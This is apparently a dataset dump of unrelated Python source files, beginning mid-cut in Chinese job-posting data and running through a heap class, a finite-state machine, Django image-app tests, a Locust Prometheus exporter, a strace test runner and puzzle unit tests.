'消费kafka中上游解析的网页数据,通过不同的策略和规则过滤分发给网页',
'具有良好的工作态度和职业道德',
'具有较强的表达能力,能主动沟通'],
'salary': '13-26K',
'site': '深圳'},
{'demands': ['有测试平台,测试工具开发经验者优先',
'精通python编程,有多个实际产品或项目开发经验,2年以上python应用经验',
'熟悉自动化框架开发者优先'],
'salary': '15-30K',
'site': '杭州'},
{'demands': ['熟练Python或JAVA或Go语言进行编程',
'良好的沟通、协调、学习、创新能力,对解决具有挑战性问题充满激情',
'具有三年以上软件开发经验',
'熟悉Linux,Docker,MySQL、Redis等开源系统应用',
'持有华为开发者学院相关证书,有优先录取资格,详情见\xa0华为开发者学院\xa0'
'人才计划(https://developer.huawei.com/consumer/cn/training/landings/kg97brca)',
'具有相关产品开发和设计经验优先'],
'salary': '12-24K',
'site': '深圳'},
{'demands': ['熟练掌握python语言、熟悉python和shell脚本',
'熟悉常用的数据结构和算法,mysql数据库使用和网络编程',
'善于交流和表达,有良好团队合作精神'],
'salary': '16-20K',
'site': '深圳'},
{'demands': ['有参与大数据系统开发过程,包括参与需求设计、设计评审、编写测试方案和测试用例,搭建测试环境,进行测试结果和线上反馈等',
'华为OD招聘',
'具备一定的编程能力或者代码阅读能力,会python编程语言,熟悉django,flask,vue',
'能够根据项目需求设计,开发测试工具提升测试效率'],
'salary': '13-16K·15薪',
'site': '东莞'},
{'demands': ['有数据分析,数据挖掘,文本挖掘相关经验',
'熟悉mysql,memcache,redis等技术',
'熟悉面向对象编程,具有良好的代码编程习惯',
'熟练使用各类深度学习框架,具有Linux下GPU多节点多卡平台架构经验',
'熟练掌握Python,代码能力扎实',
'熟悉django/tornado/flask等一种或多种框架',
'有一定的分布式、高并发系统开发或维护经验'],
'salary': '14-28K',
'site': '深圳'},
{'demands': ['熟悉Python定时任务框架:APScheduler,celery',
'3,熟悉多线程编程,linux/flask/diango/tornado/redis/',
'熟悉python开发框架:Scrapyshell'],
'salary': '11-22K·13薪',
'site': '深圳'}],
'third': [
{'demands': ['能够根据业务发展,对技术架构不断调整,持续优化',
'熟练掌握JavaScript,熟练掌握至少一种常用前端框架,如React、AngularJs、Vue',
'有扎实的计算机基础,有良好的团队合作能力,善于沟通,并具备独立解决问题的能力',
'了解计算机视觉,机器学习或深度学习者优先',
'熟练掌握数据的缓存和存储方案以及相关的开源组件,如MySQL,Redis,MongoDB等',
'参与内部数据和测试平台的设计、开发与实现',
'结合需求设计实现安全、稳定、易维护、易用的后台系统',
'熟悉linux环境,熟练掌握Python开发',
'熟悉至少一种主流Pythonweb框架的使用,如Tornado,Flask,Django等'],
'salary': '25-40K·14薪',
'site': '北京'},
{'demands': ['能够独立主导研发组系统级别的需求开发',
'岗位描述:运维自动化平台开发和一些软件的软件的二次开发',
'熟练使用mysql命令及相关工具、熟悉linux基本操作命令',
'精通使用django或其他web框架、熟悉tornado更佳',
'熟悉各种Web前端技术,包括HTML5、XML、Ajax、CSS、Javascript、JQuery等',
'扎实的计算机系统、算法、数据结构基础',
'5年以上python开发经验'],
'salary': '25-40K·16薪',
'site': '北京'},
{'demands': ['精通python语言,有扎实的编码能力,深入理解任一python框架',
'熟悉python扩展模块',
'根据开发进度和任务分配,完成相应模块的开发、编程、测试任务,解决关键问题和寻找技术方案',
'系统需求分析与设计,核心模块的开发工作',
'熟练使用至少一种数据库(MySQL/PostgreSQL/Redis/MongoDB)',
'有独立分析和解决问题的能力,有良好的团队合作精神'],
'salary': '24-35K',
'site': '上海'},
{'demands': ['服务端的基础架构优化及升级,不断提升代码质量、可扩展性和可维护性',
'有良好的编码习惯,能做到结构清晰,命名规范',
'有良好的产品意识,能够根据业务持续输出产品优化思路',
'熟悉在Unix/Linux平台上的Python服务端编程有软件项目开发、迭代和实施经验;了解并使用过一种Pythonweb开发框架(Django、Flask等)',
'参与公司产品后端的需求分析分解,设计及开发;',
'熟悉Linux操作系统,能够进行日常服务的测试部署',
'具备数据系统的规划设计及调优能力,熟悉常见关系数据库和非关系数据库'],
'salary': '25-50K',
'site': '北京'},
{'demands': ['负责Python技术的相关产品规划',
'研究并跟踪IT前沿技术',
'熟悉Python/C++/Java/Go任意一种语言,Django/Flask等任意Web框架的一种或者多种;',
'掌握web页面交互流程,熟悉Javascript调试技术;',
'熟悉常用算法和数据结构;',
'熟悉MySQL数据库操作,熟悉SQL语句编写和性能调优;',
'善于沟通,自学能力强,有强烈的求知欲,业务敏感,有独立解决分析',
'搭建系统开发环境,完成系统框架和核心代码的实现,负责解决开发过程中的技术问题'],
'salary': '25-50K·13薪',
'site': '上海'},
{'demands': ['75%工作量是开发,25%工作量是运维,开发维护基础设施,构建云环境中的监控',
'最好有云环境经验,熟悉ansible',
'不限制计算机语言,python为佳'],
'salary': '30-50K·14薪',
'site': '上海'},
{'demands': ['熟悉Python,熟悉MySQL,熟悉ES;',
'具备良好的沟通能力和团队协作精神,较强的学习能力和逻辑分析能力',
'良好的计算机基础,良好的数据结构和算法基础;',
'负责地图道路情报运营平台的开发'],
'salary': '25-50K',
'site': '北京'},
{'demands': ['熟悉常用数据库设计和开发,熟悉互联网各种类型数据交互模式',
'具有python开发经验,掌握网络爬虫开发原理,有通用网站爬取及解析的经验',
'熟悉敏捷开发流,具备良好的沟通能力和团队协作能力',
'熟悉JavaWeb开发,SpringMVC.MyBatis等常用框架,了解IOC',
'掌握HTML,JavaScript,H5,精通常见的反爬虫技术如文本混淆反爬虫',
'进行分析和预测合规和安全的现状和发展趋势',
'独立开发合规与安全态势感知平台:通过收集等级保护,合规,数据隐私,信息安全,代码泄漏,网络扫描等数据,',
'熟悉RESTFULAPI开发和接口调用',
'精通scrapy爬虫框架,对分布式爬虫'],
'salary': '25-35K',
'site': '上海'},
{'demands': ['熟练掌握pandas、numpy,熟悉数据处理',
'主导重大项目的架构设计和核心模块设计及开发',
'审核开发工程师系统设计和代码质量,制定后端技术规范和开发规范',
'熟悉Linux系统,有Linux系统进行操作开发经验的优先',
'具备扎实的开发水平和技术管理水平,能够管理中小型(10-20人)技术团队',
'熟悉Django、Flask等框架,且对一个以上框架有深入理解,能对框架进行优化者优先',
'熟悉互联网常用中间件原理,理解使用场景,对中间件有深入理解和实践者优先',
'负责应用架构设计、把控及开发',
'熟悉大规模Web应用开发,有一定的性能优化和系统安全的实践有大型互联网公司Web开发和性能调优经验优先',
'熟悉MySQL数据库,掌握数据库优化者优先',
'了解HTTP,TCP/IP等常用internet协议,熟悉Restful规范',
'有全栈开发基础或经验者优先',
'主导技术难题攻关,重构系统,保证高性能处理和系统的稳定性'],
'salary': '25-40K',
'site': '上海'},
{'demands': ['具有规范的流程思维意识,与公司产品其他部分联动,定义接口设计并跟进完成',
'熟练使用python及linux环境,redis',
'有以下经验之一者优先:1)熟练sql或hivesql者优先2)熟了解pythonspark者优先3)有项目部署经验者优先',
'参与公司产品后端的需求分析分解,设计及开发,保证产品的稳定性及性能',
'协助处理服务端开发中的常见问题',
'具有良好的学习能力,有复杂应用的架构设计和研发者优先',
'具有压力下工作的能力'],
'salary': '25-30K',
'site': '北京'}]}
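# A minimal sketch of the categorization planned in the header comment above
# (language / database / server / other). The keyword lists are assumptions
# added for illustration and only cover the most common terms in the data.
def categorize_demand(demand):
    keyword_map = {
        'language': ['python', 'shell', 'java', 'c++', 'golang', 'javascript'],
        'database': ['mysql', 'redis', 'mongodb', 'postgresql', 'sql', 'oracle', 'elasticsearch'],
        'server': ['linux', 'unix', 'docker', 'nginx', 'kubernetes', 'k8s'],
    }
    text = demand.lower()
    for category, keywords in keyword_map.items():
        if any(keyword in text for keyword in keywords):
            return category
    return 'other'


def categorize_chart(chart):
    """Group every demand string in the chart into the four categories, per stage."""
    result = {}
    for stage, postings in chart.items():
        buckets = {'language': [], 'database': [], 'server': [], 'other': []}
        for posting in postings:
            for demand in posting['demands']:
                buckets[categorize_demand(demand)].append(demand)
        result[stage] = buckets
    return result


# Example: categorized = categorize_chart(fourth_chart)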
| 31,641 | 21,949 |
class Heap():
def __init__(self, lst):
self.lst = lst
def __str__(self):
return str(self.lst)
    # Returns the left child index of a node; runs in O(1) time. Returns None if it does not exist.
def left(self, index):
index += 1
if 2 * index >= len(self.lst) + 1:
return None
return (2 * index - 1)
    # Returns the right child index of a node; runs in O(1) time. Returns None
    # if it does not exist.
def right(self, index):
index += 1
if 2 * (index) >= len(self.lst):
return None
return (2 * index)
    # Returns the parent index of a node; runs in O(1) time. Returns None if it does not exist.
def parent(self, index):
if index == 0:
return None
index += 1
return (index // 2 - 1)
    # Given a key, finds the index of that key. Runs in O(n) time, where n is
    # the size of the heap. Returns None if the key is not present.
def find(self, key):
for counter, value in enumerate(self.lst):
if key == value:
return counter
return None
# appends a key to the end of the heap
def append(self, key):
self.lst.append(key)
    # Changes the value at an index to a new key (only if the index is in range).
    def change(self, index, key):
        if index < len(self.lst):
            self.lst[index] = key
    # max_heapify "fixes" the max-heap property at the index by swapping the
    # node with the largest of its children and recursing down as needed.
    def max_heapify(self, index):
        largest = index
        l = self.left(index)
        r = self.right(index)
        if l is not None and self.lst[index] < self.lst[l]:
            largest = l
        if r is not None and self.lst[largest] < self.lst[r]:
            largest = r
        if largest != index:
            self.lst[largest], self.lst[index] = self.lst[index], self.lst[largest]
            self.max_heapify(largest)
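    # extract_max swaps the root with the last element, pops the old maximum off
    # the list, rebuilds the heap over the remaining keys, and returns the maximum.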
def extract_max(self):
        self.lst[0], self.lst[-1] = self.lst[-1], self.lst[0]
output = self.lst.pop()
self.build_max_heap()
return output
    # build_max_heap enforces the max-heap property over the whole list by
    # heapifying every internal node from the bottom up.
    def build_max_heap(self):
        size = len(self.lst)
        for i in range(size // 2 - 1, -1, -1):
            self.max_heapify(i)
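    # heap_sort prints every key in descending order; it assumes build_max_heap
    # has already been called and empties the heap as it goes.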
def heap_sort(self):
        for i in range(len(self.lst)):
print(self.extract_max())
self.build_max_heap()
    def min_heapify(self, index):
        smallest = index
        l = self.left(index)
        r = self.right(index)
        if l is not None and self.lst[index] > self.lst[l]:
            smallest = l
        if r is not None and self.lst[smallest] > self.lst[r]:
            smallest = r
        if smallest != index:
            self.lst[smallest], self.lst[index] = self.lst[index], self.lst[smallest]
            self.min_heapify(smallest)
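# A minimal usage sketch, assuming the list holds mutually comparable keys;
# build_max_heap must be called before extract_max or heap_sort.
if __name__ == '__main__':
    heap = Heap([3, 9, 2, 1, 4, 5])
    heap.build_max_heap()
    print(heap)                # heap-ordered list, largest key at index 0
    print(heap.extract_max())  # 9
    heap.heap_sort()           # prints the remaining keys in descending order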
| 2,861 | 918 |
import os
import subprocess
import sys
import threading
try:
os.mkfifo("/tmp/shutdown",0666)
except OSError:
pass
try:
os.mkfifo("/tmp/abort",0666)
except OSError:
pass
subprocess.check_call(["go","build", "-ldflags", "-X main.FALLBACK_SHUTDOWN_PIPE /tmp/shutdown -X main.FALLBACK_ABORT_PIPE /tmp/abort -X main.RUNNER0 strace -X main.RUNNER1 strace+ -X main.RUNNER_ADDITIONAL_FLAG -f -X main.RUNER_CONFIG_PREFIX trace= -X main.RUNNER_CONFIG_FLAG -e -X main.RUNNER_PATH /usr/bin/"])
try:
os.mkfifo("/tmp/stdin",0666)
except OSError:
pass
try:
os.mkfifo("/tmp/stdout",0666)
except OSError:
pass
try:
os.mkfifo("/tmp/stderr",0666)
except OSError:
pass
os.chmod("/tmp/stdin",0660)
os.chmod("/tmp/stdout",0660)
os.chmod("/tmp/stderr",0660)
def echo_stderr():
while True:
with open('/tmp/stderr','r') as stderr:
sys.stderr.write(stderr.readline())
thread = threading.Thread(target=echo_stderr)
thread.setDaemon(True)
thread.start()
repeatexec = subprocess.Popen(["sudo","./repeatexec"],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=sys.stderr)
with open("example_commands.json") as example:
for line in example.readlines():
if len(line.strip()):
print "EXECUTING ",line
repeatexec.stdin.write(line)
repeatexec.stdin.flush()
with open('/tmp/stdin','w') as stdin:
pass
with open('/tmp/stdout','r') as stdout:
print stdout.read()
exitcode = repeatexec.stdout.read(1)
print "RESPONSE ", ord(exitcode) if len(exitcode) else 'END OF TEST: SUCCESS'
| 1,647 | 621 |
import click
from nft_generator import __version__
@click.command()
def version():
print(__version__)
| 113 | 35 |
import numpy as np
arg = np.arange(100).reshape((10,10))
print(arg)
print(arg[[1, 2], [3, 4]])  # fancy indexing: picks arg[1, 3] and arg[2, 4] (the old arg[[(1,2),(3,4)]] form is deprecated)
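# np.digitize(0.4, [0.2, 0.3]) returns 2: 0.4 lies to the right of both bin edges.
# np.add.accumulate([0.1, 0.2, 0.3]) returns the running sums [0.1, 0.3, 0.6]
# (up to floating-point rounding).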
res = np.digitize(0.4,[0.2,0.3])
print(res)
print(np.add.accumulate([0.1,0.2,0.3]))
| 181 | 98 |
"""
Finite state machine class.
The FSM class stores a dictionary keyed by state/input; each value is the
next state and an action.
When searching for a matching state/input key, an exact match is checked
first, then the input is matched against any regular expressions associated
with the state. As a last resort, state/None can be used as a default for
that state.
The action is a function to execute which is called with the current state,
the input, and the regex match object (None when the lookup was not a regex
match). Note, the match argument is not shown in the example below.
Exported symbols:
class FSM
    exception FSMError - raised when an execution error occurs
int FSMEOF - used as a special input by users to signal
termination of the machine
"""
class RestartException(Exception) :
def __init__(self, value) :
self.restartto = value
def __str__(self):
return repr(self.restartto)
class FSMError(Exception):
    """Invalid input to finite state machine."""
    pass
FSMEOF = -1
import re
_rgxt = type(re.compile('foo'))
del re
class FSM:
"""
Finite State Machine
simple example:
def do_faq(state, input): send('faqfile')
def do_help(state, input): send('helpfile')
def cleanup(state, input): pass
fsm = FSM()
fsm.add('start', re.compile('help', re.I),
'start', do_help)
fsm.add('start', 'faq', 'start', do_faq)
# matches anything, does nothing
fsm.add('start', None, 'start')
fsm.add('start', FSMEOF, 'done', cleanup)
...
fsm.start('start')
for line in map(string.strip, sys.stdin.readlines()):
try:
fsm.execute(line)
except FSMError:
sys.stderr.write('Invalid input: %s\n' % `line`)
fsm.execute(FSMEOF)
"""
def __init__(self):
self.states = {}
self.state = None
self.dbg = None
# add another state to the fsm
def add(self, state, input, newstate, action=None):
"""add a new state to the state machine"""
try:
self.states[state][input] = (newstate, action)
except KeyError:
self.states[state] = {}
self.states[state][input] = (newstate, action)
def del_state(self, state) :
self.states[state] = {}
# perform a state transition and action execution
def execute(self, input):
"""execute the action for the current (state,input) pair"""
if not self.states.has_key(self.state):
raise FSMError
state = self.states[self.state]
# exact state match?
if state.has_key(input):
newstate, action = state[input]
if action is not None:
try:
apply(action, (self.state, input, None))
except RestartException, (instance):
# action routine can raise RestartException to force
# jump to a different state - usually back to start
# if input didn't look like it was supposed to
self.state = instance.restartto
return
self.state = newstate
return
# no, how about a regex match? (first match wins)
else:
for s in state.keys():
if type(s) == _rgxt:
m = s.match(input)
if m :
newstate, action = state[s]
if action is not None:
try:
apply(action, (self.state, input, m))
except RestartException, (instance):
# action routine can raise RestartException to force
# jump to a different state - usually back to start
# if input didn't look like it was supposed to
self.state = instance.restartto
return
except:
print (action, (self.state, input))
raise
self.state = newstate
return
if state.has_key(None):
newstate, action = state[None]
if action is not None:
try:
apply(action, (self.state, input, None))
                except RestartException, (instance):
# action routine can raise RestartException to force
# jump to a different state - usually back to start
# if input didn't look like it was supposed to
self.state = instance.restartto
return
self.state = newstate
return
# oh well, bombed out...
else:
raise FSMError
# define the start state
def start(self, state):
"""set the start state"""
self.state = state
# assign a writable file to catch debugging transitions
def debug(self, out=None):
"""assign a debugging file handle"""
self.dbg = out
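# A minimal usage sketch, assuming the Python 2 interpreter this module already
# targets (execute() relies on dict.has_key and apply). It exercises the three
# lookup paths described in the module docstring: exact match, regex match,
# and the state/None default.
if __name__ == '__main__':
    import re

    def on_help(state, input, match):
        print('help requested in state %s' % state)

    def on_number(state, input, match):
        print('got number %s' % match.group(0))

    def on_other(state, input, match):
        print('ignoring %r' % (input,))

    fsm = FSM()
    fsm.add('start', 'help', 'start', on_help)                # exact match
    fsm.add('start', re.compile(r'\d+'), 'start', on_number)  # regex match
    fsm.add('start', None, 'start', on_other)                 # default for the state
    fsm.start('start')
    for token in ('help', '42', 'something else'):
        fsm.execute(token)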
| 4,165 | 1,417 |
#############################################
# Screen
# ===========================================
# Purpose is to:
# - Wrap pygame display setup (sized from a config file) and simple image blitting.
#############################################
import pygame
class Screen:
def __init__(self, config_file, parser):
parser.read(config_file)
        self.size = [int(x.strip()) for x in parser.get('screen', 'size').split('x')]
        pygame.init()
        self.screen = pygame.display.set_mode((self.size[0], self.size[1]))
def display(self, name, location):
image = pygame.image.load(name)
        self.screen.blit(image, [location[0], location[1]])
pygame.display.flip()
def screen_off(self):
        pass  # turning the screen off is not implemented yet
class Game:
def __init__(self):
self.x = 1 | 735 | 214 |
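# A minimal usage sketch for Screen; the file names below are assumptions. It
# expects an INI-style config with a [screen] section such as:
#   [screen]
#   size = 800 x 600
if __name__ == '__main__':
    from configparser import ConfigParser
    screen = Screen('screen.cfg', ConfigParser())
    screen.display('splash.png', [0, 0])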
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.management.base import CommandError
from django.test.utils import override_settings
import mock
from daguerre.adjustments import Fit
from daguerre.management.commands._daguerre_clean import Command as Clean
from daguerre.management.commands._daguerre_preadjust import (
NO_ADJUSTMENTS,
BAD_STRUCTURE,
Command as Preadjust,
)
from daguerre.management.commands.daguerre import Command as Daguerre
from daguerre.models import AdjustedImage, Area
from daguerre.tests.base import BaseTestCase
class CleanTestCase(BaseTestCase):
def test_old_adjustments(self):
"""
_old_adjustments should return AdjustedImages whose storage_path
no longer exists.
"""
nonexistant = 'daguerre/test/nonexistant.png'
if default_storage.exists(nonexistant):
default_storage.delete(nonexistant)
adjusted = self.create_image('100x100.png')
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=nonexistant,
adjusted=adjusted)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path=adjusted,
adjusted=adjusted)
clean = Clean()
self.assertEqual(list(clean._old_adjustments()), [adjusted1])
default_storage.delete(adjusted)
def test_old_areas(self):
"""
_old_areas should return Areas whose storage_path no longer exists.
"""
nonexistant = 'daguerre/test/nonexistant.png'
if default_storage.exists(nonexistant):
default_storage.delete(nonexistant)
storage_path = self.create_image('100x100.png')
kwargs = {
'x1': 0,
'x2': 10,
'y1': 0,
'y2': 10
}
area1 = Area.objects.create(storage_path=nonexistant,
**kwargs)
Area.objects.create(storage_path=storage_path,
**kwargs)
clean = Clean()
self.assertEqual(list(clean._old_areas()), [area1])
default_storage.delete(storage_path)
def test_missing_adjustments(self):
"""
_missing_adjustments should return AdjustedImages whose adjusted
no longer exists.
"""
nonexistant = 'daguerre/test/nonexistant.png'
if default_storage.exists(nonexistant):
default_storage.delete(nonexistant)
storage_path = self.create_image('100x100.png')
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=storage_path,
adjusted=nonexistant)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path=storage_path,
adjusted=storage_path)
clean = Clean()
self.assertEqual(list(clean._missing_adjustments()), [adjusted1])
default_storage.delete(storage_path)
def test_duplicate_adjustments(self):
path1 = self.create_image('100x100.png')
path2 = self.create_image('100x100.png')
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=path1,
adjusted=path1)
adjusted2 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=path1,
adjusted=path1)
adjusted3 = AdjustedImage.objects.create(requested='fit|50|50',
storage_path=path2,
adjusted=path1)
clean = Clean()
duplicates = clean._duplicate_adjustments()
self.assertNotIn(adjusted3, duplicates)
self.assertTrue(list(duplicates) == [adjusted1] or
list(duplicates) == [adjusted2])
def test_orphaned_files__default_path(self):
clean = Clean()
walk_ret = (
('dg', ['test'], []),
('dg/test', [], ['fake1.png', 'fake2.png', 'fake3.png'])
)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path='whatever.png',
adjusted='dg/test/fake2.png')
with mock.patch.object(clean, '_walk', return_value=walk_ret) as walk:
self.assertEqual(clean._orphaned_files(),
['dg/test/fake1.png',
'dg/test/fake3.png'])
walk.assert_called_once_with('dg', topdown=False)
@override_settings(DAGUERRE_ADJUSTED_IMAGE_PATH='img')
def test_orphaned_files__modified_path(self):
clean = Clean()
walk_ret = (
('img', ['test'], []),
('img/test', [], ['fake1.png', 'fake2.png', 'fake3.png'])
)
AdjustedImage.objects.create(requested='fit|50|50',
storage_path='whatever.png',
adjusted='img/test/fake2.png')
with mock.patch.object(clean, '_walk', return_value=walk_ret) as walk:
self.assertEqual(clean._orphaned_files(),
['img/test/fake1.png',
'img/test/fake3.png'])
walk.assert_called_once_with('img', topdown=False)
class PreadjustTestCase(BaseTestCase):
@override_settings()
def test_get_helpers__no_setting(self):
try:
del settings.DAGUERRE_PREADJUSTMENTS
except AttributeError:
pass
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
NO_ADJUSTMENTS,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('model', [Fit(width=50)], None),))
def test_get_helpers__bad_string(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('app.model', [Fit(width=50)], None),))
def test_get_helpers__bad_model(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(1, 2, 3))
def test_get_helpers__not_tuples(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('daguerre.adjustedimage', [], 'storage_path'),))
def test_get_helpers__no_adjustments(self):
preadjust = Preadjust()
self.assertRaisesMessage(CommandError,
BAD_STRUCTURE,
preadjust._get_helpers)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
('daguerre.adjustedimage', [Fit(width=50)], 'storage_path'),))
def test_get_helpers__good_string(self):
preadjust = Preadjust()
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
(AdjustedImage, [Fit(width=50)], 'storage_path'),))
def test_get_helpers__model(self):
preadjust = Preadjust()
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
def test_get_helpers__queryset(self):
preadjust = Preadjust()
qs = AdjustedImage.objects.all()
dp = ((qs, [Fit(width=50)], 'storage_path'),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
self.assertTrue(qs._result_cache is None)
def test_get_helpers__iterable(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
adjusted = AdjustedImage.objects.create(storage_path=storage_path,
adjusted=storage_path)
def _iter():
yield adjusted
dp = ((_iter(), [Fit(width=50)], 'storage_path'),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
helpers = preadjust._get_helpers()
self.assertEqual(len(helpers), 1)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
(AdjustedImage, [Fit(width=50)], 'storage_path'),))
def test_preadjust__empty(self):
preadjust = Preadjust()
storage_path = 'does_not_exist.png'
AdjustedImage.objects.create(storage_path=storage_path,
adjusted=storage_path)
self.assertEqual(AdjustedImage.objects.count(), 1)
preadjust.stdout = mock.MagicMock()
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 1 empty path.\n'),
mock.call('Skipped 0 paths which have already been adjusted.\n'),
mock.call('No paths remaining to adjust.\n'),
])
self.assertEqual(AdjustedImage.objects.count(), 1)
@override_settings(DAGUERRE_PREADJUSTMENTS=(
(AdjustedImage, [Fit(width=50)], 'storage_path'),))
def test_preadjust__skipped(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
AdjustedImage.objects.create(storage_path=storage_path,
adjusted=storage_path,
requested='fit|50|')
self.assertEqual(AdjustedImage.objects.count(), 1)
preadjust.stdout = mock.MagicMock()
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 0 empty paths.\n'),
mock.call('Skipped 1 path which has already been adjusted.\n'),
mock.call('No paths remaining to adjust.\n'),
])
self.assertEqual(AdjustedImage.objects.count(), 1)
def test_preadjust__generate(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
self.assertEqual(AdjustedImage.objects.count(), 0)
preadjust.stdout = mock.MagicMock()
dp = (([storage_path], [Fit(width=50)], None),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 0 empty paths.\n'),
mock.call('Skipped 0 paths which have already been adjusted.\n'),
mock.call('Adjusting 1 path... '),
mock.call('Done.\n'),
])
self.assertEqual(AdjustedImage.objects.count(), 1)
def test_preadjust__generate__failed(self):
preadjust = Preadjust()
storage_path = self.create_image('100x100.png')
self.assertEqual(AdjustedImage.objects.count(), 0)
preadjust.stdout = mock.MagicMock()
dp = (([storage_path], [Fit(width=50)], None),)
with override_settings(DAGUERRE_PREADJUSTMENTS=dp):
with mock.patch('daguerre.helpers.save_image', side_effect=IOError):
preadjust._preadjust()
preadjust.stdout.write.assert_has_calls([
mock.call('Skipped 0 empty paths.\n'),
mock.call('Skipped 0 paths which have already been adjusted.\n'),
mock.call('Adjusting 1 path... '),
mock.call('Done.\n'),
mock.call('1 path failed due to I/O errors.')
])
self.assertEqual(AdjustedImage.objects.count(), 0)
class DaguerreTestCase(BaseTestCase):
def test_find_commands(self):
daguerre_command = Daguerre()
self.assertEqual(daguerre_command._find_commands(), {
'clean': '_daguerre_clean',
'preadjust': '_daguerre_preadjust'
})
| 12,332 | 3,784 |
#!/usr/bin/python
from prometheus_client import start_http_server, Metric, REGISTRY
from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily
import json
import requests
import sys
import time
class LocustCollector(object):
def __init__(self, ep):
self._ep = ep
def collect(self):
# Fetch the JSON from locust
url = f'http://{self._ep}/stats/requests'
try:
response = requests.get(url).content.decode('Utf-8')
except requests.exceptions.ConnectionError:
print("Failed to connect to Locust:", url)
exit(2)
response = json.loads(response)
yield GaugeMetricFamily('locust_user_count', 'Swarmed users', value=response['user_count'])
for err in response['errors']:
metric = GaugeMetricFamily('locust_errors', 'Locust requests errors', labels=['path', 'method'])
metric.add_metric([str(err['name']), str(err['method'])], value=err['occurences'])
yield metric
if 'slave_count' in response:
yield GaugeMetricFamily('locust_slave_count', 'Locust number of slaves', value=response['slave_count'])
yield GaugeMetricFamily('locust_fail_ratio', 'Locust failure ratio', value=response['fail_ratio'])
metric = GaugeMetricFamily('locust_state', 'State of the locust swarm', labels=['state'])
metric.add_metric([str(response['state'])], 1)
yield metric
yield GaugeMetricFamily('locust_current_response_time_percentile_50', 'Locust current_response_time_percentile_50', value=response['current_response_time_percentile_50'])
yield GaugeMetricFamily('locust_current_response_time_percentile_95', 'Locust current_response_time_percentile_95', value=response['current_response_time_percentile_95'])
        stats_metrics_gauge = ['avg_content_length','avg_response_time','current_rps','max_response_time','median_response_time','min_response_time']
stats_metrics_count = ['num_failures','num_requests']
        for mtr in stats_metrics_gauge:
metric = GaugeMetricFamily('locust_requests_' + mtr, 'locust requests ' + mtr, labels=['path', 'method'])
for stat in response['stats']:
                if 'Total' not in stat['name']:
metric.add_metric([str(stat['name']), str(stat['method'])], stat[mtr])
yield metric
for mtr in stats_metrics_count:
metric = CounterMetricFamily('locust_requests_' + mtr, 'locust requests ' + mtr, labels=['path', 'method'])
for stat in response['stats']:
                if 'Total' not in stat['name']:
metric.add_metric([str(stat['name']), str(stat['method'])], stat[mtr])
yield metric
if __name__ == '__main__':
# Usage: locust_exporter.py <port> <locust_host:port>
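    # Example invocation (port numbers here are illustrative):
    #   ./locust_exporter.py 9100 localhost:8089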
if len(sys.argv) != 3:
print('Usage: locust_exporter.py <port> <locust_host:port>')
exit(1)
else:
try:
start_http_server(int(sys.argv[1]))
REGISTRY.register(LocustCollector(str(sys.argv[2])))
print("Connecting to locust on: " + sys.argv[2])
while True: time.sleep(1)
except KeyboardInterrupt:
exit(0)
| 3,062 | 995 |
import unittest
from hexagon_spiral import hex_spiral
class Tests(unittest.TestCase):
TESTS = {
"Basics": [
{"input": [2, 9], "answer": 1, "explanation": 2},
{"input": [9, 2], "answer": 1, "explanation": 2},
{"input": [6, 19], "answer": 2, "explanation": 7},
{"input": [5, 11], "answer": 3, "explanation": 1},
{"input": [13, 15], "answer": 2, "explanation": 14},
{"input": [11, 17], "answer": 4, "explanation": 1},
{"input": [6, 4], "answer": 2, "explanation": 1},
{"input": [42, 13], "answer": 5, "explanation": 4},
{"input": [66, 81], "answer": 10, "explanation": 1},
{"input": [76, 65], "answer": 10, "explanation": 7},
{"input": [84, 78], "answer": 6, "explanation": 15},
{"input": [92, 62], "answer": 1, "explanation": 0},
{"input": [100, 1], "answer": 6, "explanation": 0},
{"input": [200, 202], "answer": 2, "explanation": 0},
],
"Extra": [
{"input": [2, 8], "answer": 1, "explanation": 0},
{"input": [9, 1], "answer": 2, "explanation": 2},
{"input": [16, 19], "answer": 3, "explanation": 7},
{"input": [55, 11], "answer": 6, "explanation": 17},
{"input": [11, 15], "answer": 4, "explanation": 1},
{"input": [21, 17], "answer": 4, "explanation": 6},
{"input": [41, 13], "answer": 6, "explanation": 1},
{"input": [77, 81], "answer": 4, "explanation": 79},
{"input": [55, 65], "answer": 8, "explanation": 32},
{"input": [92, 32], "answer": 8, "explanation": 0},
{"input": [101, 1], "answer": 6, "explanation": 0},
{"input": [300, 302], "answer": 2, "explanation": 0},
{"input": [999, 998], "answer": 1, "explanation": 0},
{"input": [84, 68], "answer": 10, "explanation": 37},
],
}
def test_Basics(self):
